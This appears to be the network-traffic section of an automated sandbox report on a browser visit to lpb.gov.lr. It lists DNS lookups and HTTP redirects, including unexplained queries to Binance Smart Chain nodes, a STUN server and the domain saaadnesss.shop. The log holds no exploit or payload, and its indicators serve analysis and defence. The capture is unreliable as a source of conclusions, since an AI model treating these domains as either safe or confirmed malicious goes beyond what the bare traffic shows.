                                                                                                                        Jan 10, 2025 14:54:52.137763023 CET6048153192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:52.138036013 CET5666853192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:52.144634962 CET53566681.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:52.145195007 CET53604811.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:52.552544117 CET53651761.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:54.864231110 CET5494353192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:54.864643097 CET5812253192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:54.870934963 CET53549431.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:54.871720076 CET5469719302192.168.2.774.125.250.129
                                                                                                                        Jan 10, 2025 14:54:54.871731043 CET53581221.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:54.872550964 CET5897953192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:54.879503012 CET53589791.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:55.135724068 CET5469719302192.168.2.774.125.250.129
                                                                                                                        Jan 10, 2025 14:54:55.323766947 CET193025469774.125.250.129192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:55.323775053 CET193025469774.125.250.129192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:55.329509020 CET5582253192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:55.329878092 CET5545653192.168.2.71.1.1.1
                                                                                                                        Jan 10, 2025 14:54:55.336597919 CET53558221.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:55.337901115 CET53554561.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:05.330626011 CET5469719302192.168.2.774.125.250.129
                                                                                                                        Jan 10, 2025 14:55:05.432820082 CET193025469774.125.250.129192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:11.565526009 CET53629791.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:15.440970898 CET5469719302192.168.2.774.125.250.129
                                                                                                                        Jan 10, 2025 14:55:15.556262970 CET193025469774.125.250.129192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:25.587816000 CET5469719302192.168.2.774.125.250.129
                                                                                                                        Jan 10, 2025 14:55:25.690599918 CET193025469774.125.250.129192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:30.561181068 CET138138192.168.2.7192.168.2.255
                                                                                                                        Jan 10, 2025 14:55:33.928488970 CET53644651.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:34.521527052 CET53596171.1.1.1192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:35.801033020 CET5469719302192.168.2.774.125.250.129
                                                                                                                        Jan 10, 2025 14:55:35.902875900 CET193025469774.125.250.129192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:45.929451942 CET5469719302192.168.2.774.125.250.129
                                                                                                                        Jan 10, 2025 14:55:46.031245947 CET193025469774.125.250.129192.168.2.7
                                                                                                                        Jan 10, 2025 14:55:56.125300884 CET5469719302192.168.2.774.125.250.129
                                                                                                                        Jan 10, 2025 14:55:56.227597952 CET193025469774.125.250.129192.168.2.7
                                                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                                                        Jan 10, 2025 14:54:41.851545095 CET192.168.2.71.1.1.1c223(Port unreachable)Destination Unreachable
                                                                                                                        Jan 10, 2025 14:54:43.239943027 CET192.168.2.71.1.1.1c227(Port unreachable)Destination Unreachable
                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                        Jan 10, 2025 14:54:38.671454906 CET192.168.2.71.1.1.10xaa96Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:38.671581984 CET192.168.2.71.1.1.10xb079Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:40.177309036 CET192.168.2.71.1.1.10x308bStandard query (0)www.lpb.gov.lrA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:40.177309990 CET192.168.2.71.1.1.10xdcbaStandard query (0)www.lpb.gov.lr65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:41.283432961 CET192.168.2.71.1.1.10xdaacStandard query (0)lpb.gov.lrA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:41.283515930 CET192.168.2.71.1.1.10xe800Standard query (0)lpb.gov.lr65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:42.698815107 CET192.168.2.71.1.1.10x2daStandard query (0)www.lpb.gov.lrA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:42.699184895 CET192.168.2.71.1.1.10x61adStandard query (0)www.lpb.gov.lr65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:44.138366938 CET192.168.2.71.1.1.10x626aStandard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:44.138366938 CET192.168.2.71.1.1.10x698cStandard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:44.138951063 CET192.168.2.71.1.1.10xcc80Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:44.139439106 CET192.168.2.71.1.1.10xc3f1Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:44.818387985 CET192.168.2.71.1.1.10xbceaStandard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:44.818511963 CET192.168.2.71.1.1.10x86ceStandard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:44.962323904 CET192.168.2.71.1.1.10x6c65Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:44.962475061 CET192.168.2.71.1.1.10x5666Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:46.114712954 CET192.168.2.71.1.1.10x98faStandard query (0)www.lpb.gov.lrA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:46.115067005 CET192.168.2.71.1.1.10x21acStandard query (0)www.lpb.gov.lr65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:46.262039900 CET192.168.2.71.1.1.10xa883Standard query (0)data-seed-prebsc-1-s1.bnbchain.orgA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:46.262331009 CET192.168.2.71.1.1.10x2e76Standard query (0)_8545._https.data-seed-prebsc-1-s1.bnbchain.org65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:47.272264004 CET192.168.2.71.1.1.10x2c8cStandard query (0)data-seed-prebsc-1-s1.bnbchain.orgA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:47.272783041 CET192.168.2.71.1.1.10xda60Standard query (0)_8545._https.data-seed-prebsc-1-s1.bnbchain.org65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:47.321537971 CET192.168.2.71.1.1.10x1bc4Standard query (0)use.fontawesome.comA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:47.321693897 CET192.168.2.71.1.1.10x86f8Standard query (0)use.fontawesome.com65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:47.327750921 CET192.168.2.71.1.1.10x5c08Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:47.328027010 CET192.168.2.71.1.1.10x611dStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:47.483722925 CET192.168.2.71.1.1.10xeec5Standard query (0)mc.yandex.ruA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:47.484168053 CET192.168.2.71.1.1.10x4f58Standard query (0)mc.yandex.ru65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:48.398540974 CET192.168.2.71.1.1.10x999aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:48.398684978 CET192.168.2.71.1.1.10xadd0Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:49.176557064 CET192.168.2.71.1.1.10x4a31Standard query (0)mc.yandex.comA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:49.176855087 CET192.168.2.71.1.1.10xf419Standard query (0)mc.yandex.com65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:49.714452028 CET192.168.2.71.1.1.10x8c0aStandard query (0)mc.yandex.comA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:49.714567900 CET192.168.2.71.1.1.10x3dStandard query (0)mc.yandex.com65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:49.738483906 CET192.168.2.71.1.1.10x6b3dStandard query (0)mc.yandex.ruA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:49.738955021 CET192.168.2.71.1.1.10x9dccStandard query (0)mc.yandex.ru65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:50.231592894 CET192.168.2.71.1.1.10x41a5Standard query (0)bsc-dataseed.binance.orgA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:50.231849909 CET192.168.2.71.1.1.10x9466Standard query (0)bsc-dataseed.binance.org65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:51.223997116 CET192.168.2.71.1.1.10x475cStandard query (0)s.w.orgA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:51.224168062 CET192.168.2.71.1.1.10xf13fStandard query (0)s.w.org65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:51.675617933 CET192.168.2.71.1.1.10x1d6eStandard query (0)bsc-dataseed.binance.orgA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:51.675870895 CET192.168.2.71.1.1.10x28c1Standard query (0)bsc-dataseed.binance.org65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:51.726094007 CET192.168.2.71.1.1.10x7651Standard query (0)mc.yandex.comA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:51.726310015 CET192.168.2.71.1.1.10x5045Standard query (0)mc.yandex.com65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:52.137763023 CET192.168.2.71.1.1.10x9ed3Standard query (0)s.w.orgA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:52.138036013 CET192.168.2.71.1.1.10xe74dStandard query (0)s.w.org65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:54.864231110 CET192.168.2.71.1.1.10xddfcStandard query (0)stun.l.google.comA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:54.864643097 CET192.168.2.71.1.1.10x5686Standard query (0)stun.l.google.com28IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:54.872550964 CET192.168.2.71.1.1.10x9d0aStandard query (0)stun.l.google.com28IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:55.329509020 CET192.168.2.71.1.1.10xe0ccStandard query (0)saaadnesss.shopA (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:55.329878092 CET192.168.2.71.1.1.10xbbcbStandard query (0)saaadnesss.shop65IN (0x0001)false
                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                        Jan 10, 2025 14:54:38.678298950 CET1.1.1.1192.168.2.70xaa96No error (0)www.google.com142.250.185.68A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:38.678499937 CET1.1.1.1192.168.2.70xb079No error (0)www.google.com65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:40.628494024 CET1.1.1.1192.168.2.70x308bNo error (0)www.lpb.gov.lr69.163.179.33A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:41.533082008 CET1.1.1.1192.168.2.70xdaacNo error (0)lpb.gov.lr69.163.179.33A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:42.733278990 CET1.1.1.1192.168.2.70x2daNo error (0)www.lpb.gov.lr69.163.179.33A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:44.144943953 CET1.1.1.1192.168.2.70x698cNo error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:44.145589113 CET1.1.1.1192.168.2.70x626aNo error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:44.145589113 CET1.1.1.1192.168.2.70x626aNo error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:44.145589113 CET1.1.1.1192.168.2.70x626aNo error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:44.145589113 CET1.1.1.1192.168.2.70x626aNo error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:44.145589113 CET1.1.1.1192.168.2.70x626aNo error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:44.145601034 CET1.1.1.1192.168.2.70xcc80No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:44.145601034 CET1.1.1.1192.168.2.70xcc80No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:44.146228075 CET1.1.1.1192.168.2.70xc3f1No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:44.825164080 CET1.1.1.1192.168.2.70xbceaNo error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:44.825844049 CET1.1.1.1192.168.2.70x86ceNo error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:44.969237089 CET1.1.1.1192.168.2.70x6c65No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:44.969237089 CET1.1.1.1192.168.2.70x6c65No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:44.969332933 CET1.1.1.1192.168.2.70x5666No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:46.279731989 CET1.1.1.1192.168.2.70x2e76Name error (3)_8545._https.data-seed-prebsc-1-s1.bnbchain.orgnonenone65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:46.290632010 CET1.1.1.1192.168.2.70xa883No error (0)data-seed-prebsc-1-s1.bnbchain.orga37dd8b3f3000a75e.awsglobalaccelerator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:46.290632010 CET1.1.1.1192.168.2.70xa883No error (0)a37dd8b3f3000a75e.awsglobalaccelerator.com3.33.155.121A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:46.290632010 CET1.1.1.1192.168.2.70xa883No error (0)a37dd8b3f3000a75e.awsglobalaccelerator.com15.197.152.159A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:46.639750004 CET1.1.1.1192.168.2.70x98faNo error (0)www.lpb.gov.lr69.163.179.33A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:47.300184965 CET1.1.1.1192.168.2.70x2c8cNo error (0)data-seed-prebsc-1-s1.bnbchain.orga37dd8b3f3000a75e.awsglobalaccelerator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:47.300184965 CET1.1.1.1192.168.2.70x2c8cNo error (0)a37dd8b3f3000a75e.awsglobalaccelerator.com15.197.152.159A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:47.300184965 CET1.1.1.1192.168.2.70x2c8cNo error (0)a37dd8b3f3000a75e.awsglobalaccelerator.com3.33.155.121A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:47.302465916 CET1.1.1.1192.168.2.70xda60Name error (3)_8545._https.data-seed-prebsc-1-s1.bnbchain.orgnonenone65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:47.328325987 CET1.1.1.1192.168.2.70x1bc4No error (0)use.fontawesome.comuse.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:47.329082012 CET1.1.1.1192.168.2.70x86f8No error (0)use.fontawesome.comuse.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:47.334431887 CET1.1.1.1192.168.2.70x5c08No error (0)www.google.com216.58.212.132A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:47.334973097 CET1.1.1.1192.168.2.70x611dNo error (0)www.google.com65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:47.490353107 CET1.1.1.1192.168.2.70xeec5No error (0)mc.yandex.ru93.158.134.119A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:47.490353107 CET1.1.1.1192.168.2.70xeec5No error (0)mc.yandex.ru77.88.21.119A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:47.490353107 CET1.1.1.1192.168.2.70xeec5No error (0)mc.yandex.ru87.250.250.119A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:47.490353107 CET1.1.1.1192.168.2.70xeec5No error (0)mc.yandex.ru87.250.251.119A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:48.405211926 CET1.1.1.1192.168.2.70x999aNo error (0)www.google.com142.250.185.164A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:48.405424118 CET1.1.1.1192.168.2.70xadd0No error (0)www.google.com65IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:49.183370113 CET1.1.1.1192.168.2.70x4a31No error (0)mc.yandex.commc.yandex.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:49.183370113 CET1.1.1.1192.168.2.70x4a31No error (0)mc.yandex.ru87.250.251.119A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:49.183370113 CET1.1.1.1192.168.2.70x4a31No error (0)mc.yandex.ru77.88.21.119A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:49.183370113 CET1.1.1.1192.168.2.70x4a31No error (0)mc.yandex.ru87.250.250.119A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:49.183370113 CET1.1.1.1192.168.2.70x4a31No error (0)mc.yandex.ru93.158.134.119A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:49.183588028 CET1.1.1.1192.168.2.70xf419No error (0)mc.yandex.commc.yandex.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:49.721355915 CET1.1.1.1192.168.2.70x8c0aNo error (0)mc.yandex.commc.yandex.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:49.721355915 CET1.1.1.1192.168.2.70x8c0aNo error (0)mc.yandex.ru77.88.21.119A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:49.721355915 CET1.1.1.1192.168.2.70x8c0aNo error (0)mc.yandex.ru87.250.251.119A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:49.721355915 CET1.1.1.1192.168.2.70x8c0aNo error (0)mc.yandex.ru87.250.250.119A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:49.721355915 CET1.1.1.1192.168.2.70x8c0aNo error (0)mc.yandex.ru93.158.134.119A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:49.721374989 CET1.1.1.1192.168.2.70x3dNo error (0)mc.yandex.commc.yandex.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:49.745321989 CET1.1.1.1192.168.2.70x6b3dNo error (0)mc.yandex.ru93.158.134.119A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:49.745321989 CET1.1.1.1192.168.2.70x6b3dNo error (0)mc.yandex.ru77.88.21.119A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:49.745321989 CET1.1.1.1192.168.2.70x6b3dNo error (0)mc.yandex.ru87.250.251.119A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:49.745321989 CET1.1.1.1192.168.2.70x6b3dNo error (0)mc.yandex.ru87.250.250.119A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:50.238730907 CET1.1.1.1192.168.2.70x41a5No error (0)bsc-dataseed.binance.orga1d4ba62fdc34338f.awsglobalaccelerator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:50.238730907 CET1.1.1.1192.168.2.70x41a5No error (0)a1d4ba62fdc34338f.awsglobalaccelerator.com35.71.137.105A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:50.238730907 CET1.1.1.1192.168.2.70x41a5No error (0)a1d4ba62fdc34338f.awsglobalaccelerator.com52.223.34.155A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:50.238904953 CET1.1.1.1192.168.2.70x9466No error (0)bsc-dataseed.binance.orga1d4ba62fdc34338f.awsglobalaccelerator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:51.230668068 CET1.1.1.1192.168.2.70x475cNo error (0)s.w.org192.0.77.48A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:51.682384014 CET1.1.1.1192.168.2.70x28c1No error (0)bsc-dataseed.binance.orga1d4ba62fdc34338f.awsglobalaccelerator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:51.701606989 CET1.1.1.1192.168.2.70x1d6eNo error (0)bsc-dataseed.binance.orga1d4ba62fdc34338f.awsglobalaccelerator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:51.701606989 CET1.1.1.1192.168.2.70x1d6eNo error (0)a1d4ba62fdc34338f.awsglobalaccelerator.com52.223.34.155A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:51.701606989 CET1.1.1.1192.168.2.70x1d6eNo error (0)a1d4ba62fdc34338f.awsglobalaccelerator.com35.71.137.105A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:51.733069897 CET1.1.1.1192.168.2.70x7651No error (0)mc.yandex.commc.yandex.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:51.733069897 CET1.1.1.1192.168.2.70x7651No error (0)mc.yandex.ru77.88.21.119A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:51.733069897 CET1.1.1.1192.168.2.70x7651No error (0)mc.yandex.ru93.158.134.119A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:51.733069897 CET1.1.1.1192.168.2.70x7651No error (0)mc.yandex.ru87.250.251.119A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:51.733069897 CET1.1.1.1192.168.2.70x7651No error (0)mc.yandex.ru87.250.250.119A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:51.733103037 CET1.1.1.1192.168.2.70x5045No error (0)mc.yandex.commc.yandex.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:52.145195007 CET1.1.1.1192.168.2.70x9ed3No error (0)s.w.org192.0.77.48A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:54.870934963 CET1.1.1.1192.168.2.70xddfcNo error (0)stun.l.google.com74.125.250.129A (IP address)IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:54.871731043 CET1.1.1.1192.168.2.70x5686No error (0)stun.l.google.com28IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:54.879503012 CET1.1.1.1192.168.2.70x9d0aNo error (0)stun.l.google.com28IN (0x0001)false
                                                                                                                        Jan 10, 2025 14:54:55.336597919 CET1.1.1.1192.168.2.70xe0ccNo error (0)saaadnesss.shop185.121.235.167A (IP address)IN (0x0001)false
                                                                                                                        • lpb.gov.lr
                                                                                                                        • www.lpb.gov.lr
                                                                                                                        • https:
                                                                                                                          • cdn.jsdelivr.net
                                                                                                                          • cdnjs.cloudflare.com
                                                                                                                          • www.google.com
                                                                                                                          • mc.yandex.ru
                                                                                                                          • mc.yandex.com
                                                                                                                          • bsc-dataseed.binance.org
                                                                                                                          • s.w.org
                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.74972369.163.179.33802924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Jan 10, 2025 14:54:40.691409111 CET429OUTGET / HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Jan 10, 2025 14:54:41.279920101 CET467INHTTP/1.1 301 Moved Permanently
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:41 GMT
                                                                                                                        Server: Apache
                                                                                                                        Location: https://lpb.gov.lr/
                                                                                                                        Content-Length: 227
                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 70 62 2e 67 6f 76 2e 6c 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://lpb.gov.lr/">here</a>.</p></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.74973169.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:42 UTC653OUTGET / HTTP/1.1
                                                                                                                        Host: lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                        Sec-Fetch-User: ?1
                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:42 UTC381INHTTP/1.1 301 Moved Permanently
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:42 GMT
                                                                                                                        Server: Apache
                                                                                                                        X-Pingback: https://www.lpb.gov.lr/xmlrpc.php
                                                                                                                        X-Redirect-By: WordPress
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
